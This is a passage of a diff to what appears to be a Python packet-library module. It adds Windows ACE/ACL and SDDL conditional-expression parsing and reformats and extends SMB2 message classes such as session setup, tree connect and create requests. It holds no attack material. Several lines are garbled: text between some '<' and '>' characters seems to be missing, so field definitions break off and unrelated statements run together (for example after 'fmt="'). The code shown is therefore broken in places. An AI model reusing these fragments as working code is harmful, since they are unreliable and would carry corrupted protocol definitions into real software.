"SYSTEM_ALARM_CALLBACK", + 0x0F: "SYSTEM_AUDIT_CALLBACK_OBJECT", + 0x10: "SYSTEM_ALARM_CALLBACK_OBJECT", + 0x11: "SYSTEM_MANDATORY_LABEL", + 0x12: "SYSTEM_RESOURCE_ATTRIBUTE", + 0x13: "SYSTEM_SCOPED_POLICY_ID", + }, + ), + FlagsField( + "AceFlags", + 0, + 8, + { + 0x01: "OBJECT_INHERIT", + 0x02: "CONTAINER_INHERIT", + 0x04: "NO_PROPAGATE_INHERIT", + 0x08: "INHERIT_ONLY", + 0x10: "INHERITED_ACE", + 0x40: "SUCCESSFUL_ACCESS", + 0x80: "FAILED_ACCESS", + }, + ), + LenField("AceSize", None, fmt=" conditional expression + condexpr = "" + if hasattr(self.payload, "ApplicationData"): + # Parse tokens + res = [] + for ct in self.payload.ApplicationData.Tokens: + if ct.TokenType in [ + # binary operators + 0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x88, 0x8e, 0x8f, + 0xa0, 0xa1 + ]: + t1 = res.pop(-1) + t0 = res.pop(-1) + tt = ct.sprintf("%TokenType%") + if ct.TokenType in [0xa0, 0xa1]: # && and || + res.append(f"({t0}) {tt} ({t1})") + else: + res.append(f"{t0} {tt} {t1}") + elif ct.TokenType in [ + # unary operators + 0x87, 0x8d, 0xa2, 0x89, 0x8a, 0x8b, 0x8c, 0x91, 0x92, 0x93 + ]: + t0 = res.pop(-1) + tt = ct.sprintf("%TokenType%") + res.append(f"{tt}{t0}") + elif ct.TokenType in [ + # values + 0x01, 0x02, 0x03, 0x04, 0x10, 0x18, 0x50, 0x51, 0xf8, 0xf9, + 0xfa, 0xfb + ]: + def lit(ct): + if ct.TokenType in [0x10, 0x18]: # literal strings + return '"%s"' % ct.value + elif ct.TokenType == 0x50: # composite + return "({%s})" % ",".join(lit(x) for x in ct.value) + else: + return str(ct.value) + res.append(lit(ct)) + elif ct.TokenType == 0x00: # padding + pass + else: + raise ValueError("Unhandled token type %s" % ct.TokenType) + if len(res) != 1: + raise ValueError("Incomplete SDDL !") + condexpr = ";(%s)" % res[0] + if self.AceType in [0x9, 0xA, 0xB, 0xD]: # Conditional ACE + conditional_ace_type = { + 0x09: "XA", + 0x0A: "XD", + 0x0B: "XU", + 0x0D: "ZA", + }[self.AceType] + return "D:(%s)" % ( + ";".join([ + conditional_ace_type, + ace_flag_string, + ace_rights, + object_guid, + inherit_object_guid, + sid + ]) + condexpr + ) + else: + ace_type = { + 0x00: "A", + 0x01: "D", + 0x02: "AU", + 0x05: "OA", + 0x06: "OD", + 0x07: "OU", + 0x11: "ML", + 0x13: "SP", + }[self.AceType] + return "(%s)" % ( + ";".join([ + ace_type, + ace_flag_string, + ace_rights, + object_guid, + inherit_object_guid, + sid + ]) + condexpr + ) + + +# [MS-DTYP] sect 2.4.4.2 + + +class WINNT_ACCESS_ALLOWED_ACE(Packet): + fields_desc = [ + FlagsField("Mask", 0, -32, _WINNT_ACCESS_MASK), + PacketField("Sid", WINNT_SID(), WINNT_SID), ] + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_ACE, AceType=0x00) + + +# [MS-DTYP] sect 2.4.4.4 + + +class WINNT_ACCESS_DENIED_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_ACE, AceType=0x01) + + +# [MS-DTYP] sect 2.4.4.17.4+ + + +class WINNT_APPLICATION_DATA_LITERAL_TOKEN(Packet): + def default_payload_class(self, payload): + return conf.padding_layer + + +WINNT_APPLICATION_DATA_LITERAL_TOKEN.fields_desc = [ + ByteEnumField("TokenType", 0, { + # [MS-DTYP] sect 2.4.4.17.5 + 0x00: "Padding token", + 0x01: "Signed int8", + 0x02: "Signed int16", + 0x03: "Signed int32", + 0x04: "Signed int64", + 0x10: "Unicode", + 0x18: "Octet String", + 0x50: "Composite", + 0x51: "SID", + # [MS-DTYP] sect 2.4.4.17.6 + 0x80: "==", + 0x81: "!=", + 0x82: "<", + 0x83: "<=", + 0x84: ">", + 0x85: ">=", + 0x86: "Contains", + 0x88: "Any_of", + 0x8e: "Not_Contains", + 0x8f: "Not_Any_of", + 0x89: "Member_of", + 0x8a: "Device_Member_of", + 0x8b: "Member_of_Any", + 0x8c: "Device_Member_of_Any", + 0x90: "Not_Member_of", + 0x91: "Not_Device_Member_of", + 0x92: "Not_Member_of_Any", + 0x93: "Not_Device_Member_of_Any", + # [MS-DTYP] sect 2.4.4.17.7 + 0x87: "Exists", + 0x8d: "Not_Exists", + 0xa0: "&&", + 0xa1: "||", + 0xa2: "!", + # [MS-DTYP] sect 2.4.4.17.8 + 0xf8: "Local attribute", + 0xf9: "User Attribute", + 0xfa: "Resource Attribute", + 0xfb: "Device Attribute", + }), + ConditionalField( + # Strings + LEIntField("length", 0), + lambda pkt: pkt.TokenType in [ + 0x10, # Unicode string + 0x18, # Octet string + 0xf8, 0xf8, 0xfa, 0xfb, # Attribute tokens + 0x50, # Composite + ] + ), + ConditionalField( + MultipleTypeField( + [ + ( + LELongField("value", 0), + lambda pkt: pkt.TokenType in [ + 0x01, # signed int8 + 0x02, # signed int16 + 0x03, # signed int32 + 0x04, # signed int64 + ] + ), + ( + StrLenFieldUtf16("value", b"", length_from=lambda pkt: pkt.length), + lambda pkt: pkt.TokenType in [ + 0x10, # Unicode string + 0xf8, 0xf8, 0xfa, 0xfb, # Attribute tokens + ] + ), + ( + StrLenField("value", b"", length_from=lambda pkt: pkt.length), + lambda pkt: pkt.TokenType == 0x18, # Octet string + ), + ( + PacketListField("value", [], WINNT_APPLICATION_DATA_LITERAL_TOKEN, + length_from=lambda pkt: pkt.length), + lambda pkt: pkt.TokenType == 0x50, # Composite + ), + + ], + StrFixedLenField("value", b"", length=0), + ), + lambda pkt: pkt.TokenType in [ + 0x01, 0x02, 0x03, 0x04, 0x10, 0x18, 0xf8, 0xf8, 0xfa, 0xfb, 0x50 + ] + ), + ConditionalField( + # Literal + ByteEnumField("sign", 0, { + 0x01: "+", + 0x02: "-", + 0x03: "None", + }), + lambda pkt: pkt.TokenType in [ + 0x01, # signed int8 + 0x02, # signed int16 + 0x03, # signed int32 + 0x04, # signed int64 + ] + ), + ConditionalField( + # Literal + ByteEnumField("base", 0, { + 0x01: "Octal", + 0x02: "Decimal", + 0x03: "Hexadecimal", + }), + lambda pkt: pkt.TokenType in [ + 0x01, # signed int8 + 0x02, # signed int16 + 0x03, # signed int32 + 0x04, # signed int64 + ] + ), +] + + +class WINNT_APPLICATION_DATA(Packet): + fields_desc = [ + StrFixedLenField("Magic", b"\x61\x72\x74\x78", length=4), + PacketListField( + "Tokens", + [], + WINNT_APPLICATION_DATA_LITERAL_TOKEN, + ), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +# [MS-DTYP] sect 2.4.4.6 + + +class WINNT_ACCESS_ALLOWED_CALLBACK_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc + [ + PacketField( + "ApplicationData", + WINNT_APPLICATION_DATA(), + WINNT_APPLICATION_DATA + ), + ] + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_CALLBACK_ACE, AceType=0x09) + + +# [MS-DTYP] sect 2.4.4.6 + + +class WINNT_ACCESS_DENIED_CALLBACK_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_CALLBACK_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_CALLBACK_ACE, AceType=0x0A) + + +# [MS-DTYP] sect 2.4.4.10 + + +class WINNT_AUDIT_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_AUDIT_ACE, AceType=0x02) + + +# [MS-DTYP] sect 2.4.5 + + +class WINNT_ACL(Packet): + fields_desc = [ + ByteField("AclRevision", 2), + ByteField("Sbz1", 0x00), + FieldLenField( + "AclSize", None, length_of="Aces", adjust=lambda _, x: x + 14, fmt=" bytes + return ( + _SMB2_post_build( + self, + pkt, + 24 + len(self.IPAddrMoveList) * 24, + { + "ResourceName": 8, + }, + ) + + pay + ) + + +# sect 2.2.2.1 + + +class SMB2_Error_ContextResponse(Packet): + fields_desc = [ + FieldLenField("ErrorDatalength", None, fmt=" bytes + return ( + _NTLM_post_build( + self, + pkt, + 64 + 36 + len(self.Dialects) * 2, + { + "NegotiateContexts": 28, + }, + config=[ + ("BufferOffset", _NTLM_ENUM.OFFSET | _NTLM_ENUM.PAD8), + ("Count", _NTLM_ENUM.COUNT), + ], + ) + + pay + ) + bind_top_down( SMB2_Header, @@ -674,16 +1778,21 @@ class SMB2_Preauth_Integrity_Capabilities(Packet): fields_desc = [ # According to the spec, this field value must be greater than 0 # (cf Section 2.2.3.1.1 of MS-SMB2.pdf) - FieldLenField( - "HashAlgorithmCount", 1, - fmt=" bytes + pkt = _NTLM_post_build( + self, + pkt, + self.OFFSET, + { + "SecurityBlob": 56, + "NegotiateContexts": 60, + }, + config=[ + ( + "BufferOffset", + { + "SecurityBlob": _NTLM_ENUM.OFFSET, + "NegotiateContexts": _NTLM_ENUM.OFFSET | _NTLM_ENUM.PAD8, + }, + ), + ], + ) + if getattr(self, "SecurityBlob", None): + if self.SecurityBlobLen is None: + pkt = pkt[:58] + struct.pack(" bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "Security": 12, - }) + pay + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "SecurityBlob": 12, + }, + ) + + pay + ) bind_top_down( @@ -921,29 +2121,39 @@ def post_build(self, pkt, pay): class SMB2_Session_Setup_Response(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 Session Setup Response" + Command = 0x0001 OFFSET = 8 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ XLEShortField("StructureSize", 0x9), - FlagsField("SessionFlags", 0, -16, { - 0x0001: "IS_GUEST", - 0x0002: "IS_NULL", - 0x0004: "ENCRYPT_DATE", - }), + FlagsField( + "SessionFlags", + 0, + -16, + { + 0x0001: "IS_GUEST", + 0x0002: "IS_NULL", + 0x0004: "ENCRYPT_DATE", + }, + ), XLEShortField("SecurityBufferOffset", None), LEShortField("SecurityLen", None), _NTLMPayloadField( - 'Buffer', OFFSET, [ + "Buffer", + OFFSET, + [ PacketField("Security", None, GSSAPI_BLOB), - ]) + ], + ), ] def __getattr__(self, attr): # Ease SMB1 backward compatibility if attr == "SecurityBlob": - return (super(SMB2_Session_Setup_Response, self).__getattr__( - "Buffer" - ) or [(None, None)])[0][1] + return ( + super(SMB2_Session_Setup_Response, self).__getattr__("Buffer") + or [(None, None)] + )[0][1] return super(SMB2_Session_Setup_Response, self).__getattr__(attr) def setfieldval(self, attr, val): @@ -955,16 +2165,24 @@ def setfieldval(self, attr, val): def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "Security": 4, - }) + pay + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "Security": 4, + }, + ) + + pay + ) bind_top_down( SMB2_Header, SMB2_Session_Setup_Response, Command=0x0001, - Flags=1 # SMB2_FLAGS_SERVER_TO_REDIR + Flags=1, # SMB2_FLAGS_SERVER_TO_REDIR ) # sect 2.2.7 @@ -972,6 +2190,7 @@ def post_build(self, pkt, pay): class SMB2_Session_Logoff_Request(_SMB2_Payload): name = "SMB2 LOGOFF Request" + Command = 0x0002 fields_desc = [ XLEShortField("StructureSize", 0x4), ShortField("reserved", 0), @@ -989,6 +2208,7 @@ class SMB2_Session_Logoff_Request(_SMB2_Payload): class SMB2_Session_Logoff_Response(_SMB2_Payload): name = "SMB2 LOGOFF Request" + Command = 0x0002 fields_desc = [ XLEShortField("StructureSize", 0x4), ShortField("reserved", 0), @@ -999,7 +2219,7 @@ class SMB2_Session_Logoff_Response(_SMB2_Payload): SMB2_Header, SMB2_Session_Logoff_Response, Command=0x0002, - Flags=1 # SMB2_FLAGS_SERVER_TO_REDIR + Flags=1, # SMB2_FLAGS_SERVER_TO_REDIR ) # sect 2.2.9 @@ -1007,26 +2227,41 @@ class SMB2_Session_Logoff_Response(_SMB2_Payload): class SMB2_Tree_Connect_Request(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 TREE_CONNECT Request" + Command = 0x0003 OFFSET = 8 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ XLEShortField("StructureSize", 0x9), - FlagsField("Flags", 0, -16, ["CLUSTER_RECONNECT", - "REDIRECT_TO_OWNER", - "EXTENSION_PRESENT"]), + FlagsField( + "Flags", + 0, + -16, + ["CLUSTER_RECONNECT", "REDIRECT_TO_OWNER", "EXTENSION_PRESENT"], + ), XLEShortField("PathBufferOffset", None), LEShortField("PathLen", None), _NTLMPayloadField( - 'Buffer', OFFSET, [ + "Buffer", + OFFSET, + [ StrFieldUtf16("Path", b""), - ]) + ], + ), ] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "Path": 4, - }) + pay + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "Path": 4, + }, + ) + + pay + ) bind_top_down( @@ -1038,119 +2273,88 @@ def post_build(self, pkt, pay): # sect 2.2.10 -SMB2_ACCESS_FLAGS = { - # sect 2.2.13.1.2 - 0x00000001: "FILE_LIST_DIRECTORY", - 0x00000002: "FILE_ADD_FILE", - 0x00000004: "FILE_ADD_SUBDIRECTORY", - 0x00000008: "FILE_READ_EA", - 0x00000010: "FILE_WRITE_EA", - 0x00000020: "FILE_TRAVERSE", - 0x00000040: "FILE_DELETE_CHILD", - 0x00000080: "FILE_READ_ATTRIBUTES", - 0x00000100: "FILE_WRITE_ATTRIBUTES", - 0x00010000: "DELETE", - 0x00020000: "READ_CONTROL", - 0x00040000: "WRITE_DAC", - 0x00080000: "WRITE_OWNER", - 0x00100000: "SYNCHRONIZE", - 0x01000000: "ACCESS_SYSTEM_SECURITY", - 0x02000000: "MAXIMUM_ALLOWED", - 0x10000000: "GENERIC_ALL", - 0x20000000: "GENERIC_EXECUTE", - 0x40000000: "GENERIC_WRITE", - 0x80000000: "GENERIC_READ", -} - - class SMB2_Tree_Connect_Response(_SMB2_Payload): name = "SMB2 TREE_CONNECT Response" + Command = 0x0003 fields_desc = [ XLEShortField("StructureSize", 0x10), - ByteEnumField("ShareType", 0, {0x01: "DISK", - 0x02: "PIPE", - 0x03: "PRINT"}), + ByteEnumField("ShareType", 0, {0x01: "DISK", 0x02: "PIPE", 0x03: "PRINT"}), ByteField("Reserved", 0), - FlagsField("ShareFlags", 0x30, -32, { - 0x00000010: "AUTO_CACHING", - 0x00000020: "VDO_CACHING", - 0x00000030: "NO_CACHING", - 0x00000001: "DFS", - 0x00000002: "DFS_ROOT", - 0x00000100: "RESTRICT_EXCLUSIVE_OPENS", - 0x00000200: "FORCE_SHARED_DELETE", - 0x00000400: "ALLOW_NAMESPACE_CACHING", - 0x00000800: "ACCESS_BASED_DIRECTORY_ENUM", - 0x00001000: "FORCE_LEVELII_OPLOCK", - 0x00002000: "ENABLE_HASH_V1", - 0x00004000: "ENABLE_HASH_V2", - 0x00008000: "ENCRYPT_DATA", - 0x00040000: "IDENTITY_REMOTING", - 0x00100000: "COMPRESS_DATA", - }), - FlagsField("Capabilities", 0, -32, { - 0x00000008: "DFS", - 0x00000010: "CONTINUOUS_AVAILABILITY", - 0x00000020: "SCALEOUT", - 0x00000040: "CLUSTER", - 0x00000080: "ASYMMETRIC", - 0x00000100: "REDIRECT_TO_OWNER", - }), - FlagsField("MaximalAccess", 0, -32, SMB2_ACCESS_FLAGS), + FlagsField( + "ShareFlags", + 0x30, + -32, + { + 0x00000010: "AUTO_CACHING", + 0x00000020: "VDO_CACHING", + 0x00000030: "NO_CACHING", + 0x00000001: "DFS", + 0x00000002: "DFS_ROOT", + 0x00000100: "RESTRICT_EXCLUSIVE_OPENS", + 0x00000200: "FORCE_SHARED_DELETE", + 0x00000400: "ALLOW_NAMESPACE_CACHING", + 0x00000800: "ACCESS_BASED_DIRECTORY_ENUM", + 0x00001000: "FORCE_LEVELII_OPLOCK", + 0x00002000: "ENABLE_HASH_V1", + 0x00004000: "ENABLE_HASH_V2", + 0x00008000: "ENCRYPT_DATA", + 0x00040000: "IDENTITY_REMOTING", + 0x00100000: "COMPRESS_DATA", + }, + ), + FlagsField( + "Capabilities", + 0, + -32, + { + 0x00000008: "DFS", + 0x00000010: "CONTINUOUS_AVAILABILITY", + 0x00000020: "SCALEOUT", + 0x00000040: "CLUSTER", + 0x00000080: "ASYMMETRIC", + 0x00000100: "REDIRECT_TO_OWNER", + }, + ), + FlagsField("MaximalAccess", 0, -32, SMB2_ACCESS_FLAGS_FILE), ] -bind_top_down( - SMB2_Header, - SMB2_Tree_Connect_Response, - Command=0x0003, - Flags=1 -) +bind_top_down(SMB2_Header, SMB2_Tree_Connect_Response, Command=0x0003, Flags=1) # sect 2.2.11 class SMB2_Tree_Disconnect_Request(_SMB2_Payload): name = "SMB2 TREE_DISCONNECT Request" + Command = 0x0004 fields_desc = [ XLEShortField("StructureSize", 0x4), XLEShortField("Reserved", 0), ] -bind_top_down( - SMB2_Header, - SMB2_Tree_Disconnect_Request, - Command=0x0004 -) +bind_top_down(SMB2_Header, SMB2_Tree_Disconnect_Request, Command=0x0004) # sect 2.2.12 class SMB2_Tree_Disconnect_Response(_SMB2_Payload): name = "SMB2 TREE_DISCONNECT Response" + Command = 0x0004 fields_desc = [ XLEShortField("StructureSize", 0x4), XLEShortField("Reserved", 0), ] -bind_top_down( - SMB2_Header, - SMB2_Tree_Disconnect_Response, - Command=0x0004, - Flags=1 -) +bind_top_down(SMB2_Header, SMB2_Tree_Disconnect_Response, Command=0x0004, Flags=1) # sect 2.2.14.1 class SMB2_FILEID(Packet): - fields_desc = [ - XLELongField("Persistent", 0), - XLELongField("Volatile", 0) - ] + fields_desc = [XLELongField("Persistent", 0), XLELongField("Volatile", 0)] def __hash__(self): return self.Persistent + self.Volatile << 64 @@ -1158,6 +2362,7 @@ def __hash__(self): def default_payload_class(self, payload): return conf.padding_layer + # sect 2.2.14.2 @@ -1170,14 +2375,14 @@ class SMB2_CREATE_DURABLE_HANDLE_RESPONSE(Packet): class SMB2_CREATE_QUERY_MAXIMAL_ACCESS_RESPONSE(Packet): fields_desc = [ LEIntEnumField("QueryStatus", 0, STATUS_ERREF), - FlagsField("MaximalAccess", 0, -32, SMB2_ACCESS_FLAGS), + FlagsField("MaximalAccess", 0, -32, SMB2_ACCESS_FLAGS_FILE), ] class SMB2_CREATE_QUERY_ON_DISK_ID(Packet): fields_desc = [ - LELongField("DiskFileId", 0), - LELongField("VolumeId", 0), + XLELongField("DiskFileId", 0), + XLELongField("VolumeId", 0), XStrFixedLenField("Reserved", b"", length=16), ] @@ -1185,15 +2390,25 @@ class SMB2_CREATE_QUERY_ON_DISK_ID(Packet): class SMB2_CREATE_RESPONSE_LEASE(Packet): fields_desc = [ XStrFixedLenField("LeaseKey", b"", length=16), - FlagsField("LeaseState", 0x7, -32, { - 0x01: "SMB2_LEASE_READ_CACHING", - 0x02: "SMB2_LEASE_HANDLE_CACHING", - 0x04: "SMB2_LEASE_WRITE_CACHING", - }), - FlagsField("LeaseFlags", 0, -32, { - 0x02: "SMB2_LEASE_FLAG_BREAK_IN_PROGRESS", - 0x04: "SMB2_LEASE_FLAG_PARENT_LEASE_KEY_SET", - }), + FlagsField( + "LeaseState", + 0x7, + -32, + { + 0x01: "SMB2_LEASE_READ_CACHING", + 0x02: "SMB2_LEASE_HANDLE_CACHING", + 0x04: "SMB2_LEASE_WRITE_CACHING", + }, + ), + FlagsField( + "LeaseFlags", + 0, + -32, + { + 0x02: "SMB2_LEASE_FLAG_BREAK_IN_PROGRESS", + 0x04: "SMB2_LEASE_FLAG_PARENT_LEASE_KEY_SET", + }, + ), LELongField("LeaseDuration", 0), ] @@ -1210,11 +2425,17 @@ class SMB2_CREATE_RESPONSE_LEASE_V2(Packet): class SMB2_CREATE_DURABLE_HANDLE_RESPONSE_V2(Packet): fields_desc = [ LEIntField("Timeout", 0), - FlagsField("Flags", 0, -32, { - 0x02: "SMB2_DHANDLE_FLAG_PERSISTENT", - }), + FlagsField( + "Flags", + 0, + -32, + { + 0x02: "SMB2_DHANDLE_FLAG_PERSISTENT", + }, + ), ] + # sect 2.2.13 @@ -1272,9 +2493,14 @@ class SMB2_CREATE_DURABLE_HANDLE_RECONNECT_V2(Packet): fields_desc = [ PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), UUIDField("CreateGuid", 0x0, uuid_fmt=UUIDField.FORMAT_LE), - FlagsField("Flags", 0, -32, { - 0x02: "SMB2_DHANDLE_FLAG_PERSISTENT", - }), + FlagsField( + "Flags", + 0, + -32, + { + 0x02: "SMB2_DHANDLE_FLAG_PERSISTENT", + }, + ), ] @@ -1298,7 +2524,7 @@ class SMB2_CREATE_APP_INSTANCE_VERSION(Packet): class SMB2_Create_Context(_NTLMPayloadPacket): name = "SMB2 CREATE CONTEXT" - OFFSET = 14 + OFFSET = 16 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ LEIntField("Next", None), @@ -1306,19 +2532,32 @@ class SMB2_Create_Context(_NTLMPayloadPacket): LEShortField("NameLen", None), ShortField("Reserved", 0), XLEShortField("DataBufferOffset", None), - LEShortField("DataLen", None), + LEIntField("DataLen", None), _NTLMPayloadField( - 'Buffer', OFFSET, [ - StrLenField("Name", b"", - length_from=lambda pkt: pkt.NameLen), - PacketLenField("Data", None, conf.raw_layer, - length_from=lambda pkt: pkt.DataLen), - ]), - StrLenField("pad", b"", - length_from=lambda x: ( - x.Next - - max(x.DataBufferOffset + x.DataLen, - x.NameBufferOffset + x.NameLen)) if x.Next else 0) + "Buffer", + OFFSET, + [ + PadField( + StrLenField("Name", b"", length_from=lambda pkt: pkt.NameLen), + 8, + ), + # Must be padded on 8-octet alignment + PacketLenField( + "Data", None, conf.raw_layer, length_from=lambda pkt: pkt.DataLen + ), + ], + force_order=["Name", "Data"], + ), + StrLenField( + "pad", + b"", + length_from=lambda x: ( + x.Next + - max(x.DataBufferOffset + x.DataLen, x.NameBufferOffset + x.NameLen) + ) + if x.Next + else 0, + ), ] def post_dissect(self, s): @@ -1337,8 +2576,8 @@ def post_dissect(self, s): b"DH2Q": SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2, b"DH2C": SMB2_CREATE_DURABLE_HANDLE_RECONNECT_V2, # 3.1.1 only - b'E\xbc\xa6j\xef\xa7\xf7J\x90\x08\xfaF.\x14Mt': SMB2_CREATE_APP_INSTANCE_ID, # noqa: E501 - b'\xb9\x82\xd0\xb7;V\x07O\xa0{RJ\x81\x16\xa0\x10': SMB2_CREATE_APP_INSTANCE_VERSION, # noqa: E501 + b"E\xbc\xa6j\xef\xa7\xf7J\x90\x08\xfaF.\x14Mt": SMB2_CREATE_APP_INSTANCE_ID, # noqa: E501 + b"\xb9\x82\xd0\xb7;V\x07O\xa0{RJ\x81\x16\xa0\x10": SMB2_CREATE_APP_INSTANCE_VERSION, # noqa: E501 }[self.Name] if self.Name == b"RqLs" and self.DataLen > 32: data_cls = SMB2_CREATE_REQUEST_LEASE_V2 @@ -1364,10 +2603,28 @@ def default_payload_class(self, _): def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "Name": 4, - "Data": 10, - }) + pay + return ( + _NTLM_post_build( + self, + pkt, + self.OFFSET, + { + "Name": 4, + "Data": 10, + }, + config=[ + ( + "BufferOffset", + { + "Name": _NTLM_ENUM.OFFSET, + "Data": _NTLM_ENUM.OFFSET | _NTLM_ENUM.PAD8, + }, + ), + ("Len", _NTLM_ENUM.LEN), + ], + ) + + pay + ) # sect 2.2.13 @@ -1377,88 +2634,121 @@ def post_build(self, pkt, pay): 0x01: "SMB2_OPLOCK_LEVEL_II", 0x08: "SMB2_OPLOCK_LEVEL_EXCLUSIVE", 0x09: "SMB2_OPLOCK_LEVEL_BATCH", - 0xff: "SMB2_OPLOCK_LEVEL_LEASE", + 0xFF: "SMB2_OPLOCK_LEVEL_LEASE", } class SMB2_Create_Request(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 CREATE Request" + Command = 0x0005 OFFSET = 56 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ XLEShortField("StructureSize", 0x39), ByteField("ShareType", 0), ByteEnumField("RequestedOplockLevel", 0, SMB2_OPLOCK_LEVELS), - LEIntEnumField("ImpersonationLevel", 0, { - 0x00000000: "Anonymous", - 0x00000001: "Identification", - 0x00000002: "Impersonation", - 0x00000003: "Delegate", - }), + LEIntEnumField( + "ImpersonationLevel", + 0, + { + 0x00000000: "Anonymous", + 0x00000001: "Identification", + 0x00000002: "Impersonation", + 0x00000003: "Delegate", + }, + ), LELongField("SmbCreateFlags", 0), LELongField("Reserved", 0), - FlagsField("DesiredAccess", 0, -32, SMB2_ACCESS_FLAGS), + FlagsField("DesiredAccess", 0, -32, SMB2_ACCESS_FLAGS_FILE), FlagsField("FileAttributes", 0x00000080, -32, FileAttributes), - FlagsField("ShareAccess", 0, -32, { - 0x00000001: "FILE_SHARE_READ", - 0x00000002: "FILE_SHARE_WRITE", - 0x00000004: "FILE_SHARE_DELETE", - }), - LEIntEnumField("CreateDisposition", 1, { - 0x00000000: "FILE_SUPERSEDE", - 0x00000001: "FILE_OPEN", - 0x00000002: "FILE_CREATE", - 0x00000003: "FILE_OPEN_IF", - 0x00000004: "FILE_OVERWRITE", - 0x00000005: "FILE_OVERWRITE_IF", - }), - FlagsField("CreateOptions", 0, -32, { - 0x00000001: "FILE_DIRECTORY_FILE", - 0x00000002: "FILE_WRITE_THROUGH", - 0x00000004: "FILE_SEQUENTIAL_ONLY", - 0x00000008: "FILE_NO_INTERMEDIATE_BUFFERING", - 0x00000010: "FILE_SYNCHRONOUS_IO_ALERT", - 0x00000020: "FILE_SYNCHRONOUS_IO_NONALERT", - 0x00000040: "FILE_NON_DIRECTORY_FILE", - 0x00000100: "FILE_COMPLETE_IF_OPLOCKED", - 0x00000200: "FILE_RANDOM_ACCESS", - 0x00001000: "FILE_DELETE_ON_CLOSE", - 0x00002000: "FILE_OPEN_BY_FILE_ID", - 0x00004000: "FILE_OPEN_FOR_BACKUP_INTENT", - 0x00008000: "FILE_NO_COMPRESSION", - 0x00000400: "FILE_OPEN_REMOTE_INSTANCE", - 0x00010000: "FILE_OPEN_REQUIRING_OPLOCK", - 0x00020000: "FILE_DISALLOW_EXCLUSIVE", - 0x00100000: "FILE_RESERVE_OPFILTER", - 0x00200000: "FILE_OPEN_REPARSE_POINT", - 0x00400000: "FILE_OPEN_NO_RECALL", - 0x00800000: "FILE_OPEN_FOR_FREE_SPACE_QUERY", - }), + FlagsField( + "ShareAccess", + 0, + -32, + { + 0x00000001: "FILE_SHARE_READ", + 0x00000002: "FILE_SHARE_WRITE", + 0x00000004: "FILE_SHARE_DELETE", + }, + ), + LEIntEnumField( + "CreateDisposition", + 1, + { + 0x00000000: "FILE_SUPERSEDE", + 0x00000001: "FILE_OPEN", + 0x00000002: "FILE_CREATE", + 0x00000003: "FILE_OPEN_IF", + 0x00000004: "FILE_OVERWRITE", + 0x00000005: "FILE_OVERWRITE_IF", + }, + ), + FlagsField( + "CreateOptions", + 0, + -32, + { + 0x00000001: "FILE_DIRECTORY_FILE", + 0x00000002: "FILE_WRITE_THROUGH", + 0x00000004: "FILE_SEQUENTIAL_ONLY", + 0x00000008: "FILE_NO_INTERMEDIATE_BUFFERING", + 0x00000010: "FILE_SYNCHRONOUS_IO_ALERT", + 0x00000020: "FILE_SYNCHRONOUS_IO_NONALERT", + 0x00000040: "FILE_NON_DIRECTORY_FILE", + 0x00000100: "FILE_COMPLETE_IF_OPLOCKED", + 0x00000200: "FILE_RANDOM_ACCESS", + 0x00001000: "FILE_DELETE_ON_CLOSE", + 0x00002000: "FILE_OPEN_BY_FILE_ID", + 0x00004000: "FILE_OPEN_FOR_BACKUP_INTENT", + 0x00008000: "FILE_NO_COMPRESSION", + 0x00000400: "FILE_OPEN_REMOTE_INSTANCE", + 0x00010000: "FILE_OPEN_REQUIRING_OPLOCK", + 0x00020000: "FILE_DISALLOW_EXCLUSIVE", + 0x00100000: "FILE_RESERVE_OPFILTER", + 0x00200000: "FILE_OPEN_REPARSE_POINT", + 0x00400000: "FILE_OPEN_NO_RECALL", + 0x00800000: "FILE_OPEN_FOR_FREE_SPACE_QUERY", + }, + ), XLEShortField("NameBufferOffset", None), LEShortField("NameLen", None), XLEIntField("CreateContextsBufferOffset", None), LEIntField("CreateContextsLen", None), _NTLMPayloadField( - 'Buffer', OFFSET, [ + "Buffer", + OFFSET, + [ StrFieldUtf16("Name", b""), - _NextPacketListField("CreateContexts", [], SMB2_Create_Context, - length_from=lambda pkt: pkt.CreateContextsLen), - ]) + _NextPacketListField( + "CreateContexts", + [], + SMB2_Create_Context, + length_from=lambda pkt: pkt.CreateContextsLen, + ), + ], + ), ] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "Name": 44, - "CreateContexts": 48, - }) + pay + if len(pkt) == 0x38: + # 'In the request, the Buffer field MUST be at least one byte in length.' + pkt += b"\x00" + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "Name": 44, + "CreateContexts": 48, + }, + ) + + pay + ) -bind_top_down( - SMB2_Header, - SMB2_Create_Request, - Command=0x0005 -) 